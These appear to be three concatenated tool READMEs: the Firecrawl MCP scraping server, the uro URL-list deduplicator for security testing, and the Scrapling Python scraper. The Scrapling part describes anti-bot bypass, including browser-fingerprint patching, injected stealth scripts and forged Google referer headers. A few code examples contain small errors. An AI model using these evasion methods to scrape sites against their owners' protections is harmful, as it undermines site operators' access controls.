A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
Β
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor π₯οΈ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide
To configure Firecrawl MCP in Cursor v0.45.6
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6
json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }
If you are using Windows and are running into issues, try
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key
with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
FIRECRAWL_API_KEY
: Your Firecrawl API keyFIRECRAWL_API_URL
FIRECRAWL_API_URL
(Optional): Custom API endpoint for self-hosted instanceshttps://firecrawl.your-domain.com
FIRECRAWL_RETRY_MAX_ATTEMPTS
: Maximum number of retry attempts (default: 3)FIRECRAWL_RETRY_INITIAL_DELAY
: Initial delay in milliseconds before first retry (default: 1000)FIRECRAWL_RETRY_MAX_DELAY
: Maximum delay in milliseconds between retries (default: 10000)FIRECRAWL_RETRY_BACKOFF_FACTOR
: Exponential backoff multiplier (default: 2)FIRECRAWL_CREDIT_WARNING_THRESHOLD
: Credit usage warning threshold (default: 1000)FIRECRAWL_CREDIT_CRITICAL_THRESHOLD
: Credit usage critical threshold (default: 100)For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
Add this to your claude_desktop_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:
Retry Behavior
Automatically retries failed requests due to rate limits
Example: With default settings, retries will be attempted at:
Credit Usage Monitoring
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape
)Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
firecrawl_batch_scrape
)Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status
)Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search
)Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl
)Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract
)Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
urls
: Array of URLs to extract information fromprompt
: Custom prompt for the LLM extractionsystemPrompt
: System prompt to guide the LLMschema
: JSON schema for structured data extractionallowExternalLinks
: Allow extraction from external linksenableWebSearch
: Enable web search for additional contextincludeSubdomains
: Include subdomains in extractionWhen using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.
Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments:
Returns:
Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments:
Returns:
The server includes comprehensive logging:
Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling:
Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
npm test
MIT License - see LICENSE file for details
Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
It doesn't make any http requests to the URLs and removes: - incremental urls e.g. /page/1/
and /page/2/
- blog posts and similar human written content e.g. /posts/a-brief-history-of-time
- urls with same path but parameter value difference e.g. /page.php?id=1
and /page.php?id=2
- images, js, css and other "useless" files
The recommended way to install uro is as follows:
pipx install uro
Note: If you are using an older version of python, use
pip
instead ofpipx
The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.
cat urls.txt | uro
uro -i input.txt
If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.
uro -i input.txt -o output.txt
-w/--whitelist
)uro will ignore all other extensions except the ones provided.
uro -w php asp html
Note: Extensionless pages e.g. /books/1
will still be included. To remove them too, use --filter hasext
.
-b/--blacklist
)uro will ignore the given extensions.
uro -b jpg png js pdf
Note: uro has a list of "useless" extensions which it removes by default; that list will be overridden by whatever extensions you provide through blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext
.
For granular control, uro supports the following filters:
http://example.com/page.php?id=
http://example.com/page.php
http://example.com/page.php
http://example.com/page
.jpg
which would be removed otherwisehttp://example.com/page/
Example: uro --filters hasexts hasparams
Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.
Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.
>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!
Fetcher
class.PlayWrightFetcher
class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!StealthyFetcher
and PlayWrightFetcher
classes.from scrapling.fetchers import Fetcher
fetcher = Fetcher(auto_match=False)
# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))
# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above
# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]
# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...
# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)
To keep it simple, all methods can be chained on top of each other!
Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.
# | Library | Time (ms) | vs Scrapling |
---|---|---|---|
1 | Scrapling | 5.44 | 1.0x |
2 | Parsel/Scrapy | 5.53 | 1.017x |
3 | Raw Lxml | 6.76 | 1.243x |
4 | PyQuery | 21.96 | 4.037x |
5 | Selectolax | 67.12 | 12.338x |
6 | BS4 with Lxml | 1307.03 | 240.263x |
7 | MechanicalSoup | 1322.64 | 243.132x |
8 | BS4 with html5lib | 3373.75 | 620.175x |
As you see, Scrapling is on par with Scrapy and slightly faster than Lxml which both libraries are built on top of. These are the closest results to Scrapling. PyQuery is also built on top of Lxml but still, Scrapling is 4 times faster.
Library | Time (ms) | vs Scrapling |
---|---|---|
Scrapling | 2.51 | 1.0x |
AutoScraper | 11.41 | 4.546x |
Scrapling can find elements with more methods and it returns full element Adaptor
objects not only the text like AutoScraper. So, to make this test fair, both libraries will extract an element with text, find similar elements, and then extract the text content for all of them. As you see, Scrapling is still 4.5 times faster at the same task.
All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.
Scrapling is a breeze to get started with; Starting from version 0.2.9, we require at least Python 3.9 to work.
pip3 install scrapling
Then run this command to install browsers' dependencies needed to use Fetcher classes
scrapling install
If you have any installation issues, please open an issue.
Fetchers are interfaces built on top of other libraries with added features that do requests or fetch pages for you in a single request fashion and then return an Adaptor
object. This feature was introduced because the only option we had before was to fetch the page as you wanted it, then pass it manually to the Adaptor
class to create an Adaptor
instance and start playing around with the page.
You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way
from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher
All of them can take these initialization arguments: auto_match
, huge_tree
, keep_comments
, keep_cdata
, storage
, and storage_args
, which are the same ones you give to the Adaptor
class.
If you don't want to pass arguments to the generated Adaptor
object and want to use the default values, you can use this import instead for cleaner code:
from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
then use it right away without initializing like:
page = StealthyFetcher.fetch('https://example.com')
Also, the Response
object returned from all fetchers is the same as the Adaptor
object except it has these added attributes: status
, reason
, cookies
, headers
, history
, and request_headers
. All cookies
, headers
, and request_headers
are always of type dictionary
.
[!NOTE] The
auto_match
argument is enabled by default which is the one you should care about the most as you will see later.
This class is built on top of httpx with additional configuration options, here you can do GET
, POST
, PUT
, and DELETE
requests.
For all methods, you have stealthy_headers
which makes Fetcher
create and use real browser's headers then create a referer header as if this request came from Google's search of this URL's domain. It's enabled by default. You can also set the number of retries with the argument retries
for all methods and this will make httpx retry requests if it failed for any reason. The default number of retries for all Fetcher
methods is 3.
Hence: All headers generated by
stealthy_headers
argument can be overwritten by you through theheaders
argument
You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format http://username:password@localhost:8030
>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')
For Async requests, you will just replace the import like below:
>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')
This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.
>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection') # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.
>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
Note: all requests done by this fetcher are waiting by default for all JS to be fully loaded and executed so you don't have to :)
Using this Fetcher class, you can make requests with: 1) Vanilla Playwright without any modifications other than the ones you chose. 2) Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include: * Patching the CDP runtime fingerprint. * Mimics some of the real browsers' properties by injecting several JS files and using custom options. * Using custom flags on launch to hide Playwright even more and make it faster. * Generates real browser's headers of the same type and same user OS then append it to the request's headers. 3) Real browsers by passing the real_chrome
argument or the CDP URL of your browser to be controlled by the Fetcher and most of the options can be enabled on it. 4) NSTBrowser's docker browserless option by passing the CDP URL and enabling nstbrowser_mode
option.
Hence using the
real_chrome
argument requires that you have Chrome browser installed on your device
Add that to a lot of controlling/hiding options as you will see in the arguments list below.
This list isn't final so expect a lot more additions and flexibility to be added in the next versions!
>>> quote.tag
'div'
>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>
>>> quote.parent.tag
'div'
>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]
>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>
>>> quote.children.css_first(".author::text")
'Albert Einstein'
>>> quote.has_class('quote')
True
# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'
# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'
If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below
for ancestor in quote.iterancestors():
# do something with it...
You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor
object as an argument and return True
if the condition satisfies or False
otherwise like below:
>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>
You can select elements by their text content in multiple ways, here's a full example on another website:
>>> page = Fetcher().get('https://books.toscrape.com/index.html')
>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>
>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'
>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>
>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]
Find all elements that are similar to the current element in location and attributes
# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]
# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19
# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]
To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason
>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...
The documentation will provide more advanced examples.
Let's say you are scraping a page with a structure like this:
<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>
And you want to scrape the first product, the one with the p1
ID. You will probably write a selector like this
page.css('#p1')
When website owners implement structural changes like
<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>
The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.
from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...
How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.
Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.
To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)
If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a
This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions
>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'
Note that I used a new argument called automatch_domain
, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.
In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain
argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)
Notes: 1. For the two examples above I used one time the Adaptor
class and the second time the Fetcher
class just to show you that you can create the Adaptor
object by yourself if you have the source or fetch the source using any Fetcher
class then it will create the Adaptor
object for you. 2. Passing the auto_save
argument with the auto_match
argument set to False
while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save
argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info.
This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match
argument.
auto_match
parameter works only for Adaptor
instances not Adaptors
so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True)
because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)
Inspired by BeautifulSoup's find_all
function you can find elements by using find_all
/find
methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.
So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:
Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.
Examples to clear any confusion :)
>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]
# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]
# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]
# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]
# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]
# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]
# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]
Here's what else you can do with Scrapling:
lxml.etree
object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
Saving and retrieving elements manually to auto-match them outside the css
and the xpath
methods but you have to set the identifier by yourself.
To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')
python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
if you want to keep it as lxml.etree
object, leave the adaptor_type
argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]
Filtering results based on a function
# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options
except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it )
Hence all of these methods are methods from the TextHandler
within that contains the text content so the same can be done directly if you call the .text
property or equivalent selector function.
Doing operations on the text content itself includes
python quote.clean()
TextHandler
objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)
To be clear,
TextHandler
is a sub-class of Python'sstr
so all normal operations/methods that work with Python strings will work with it.
Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler
that's read-only so it's faster and string values returned are actually TextHandler
objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)
python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}
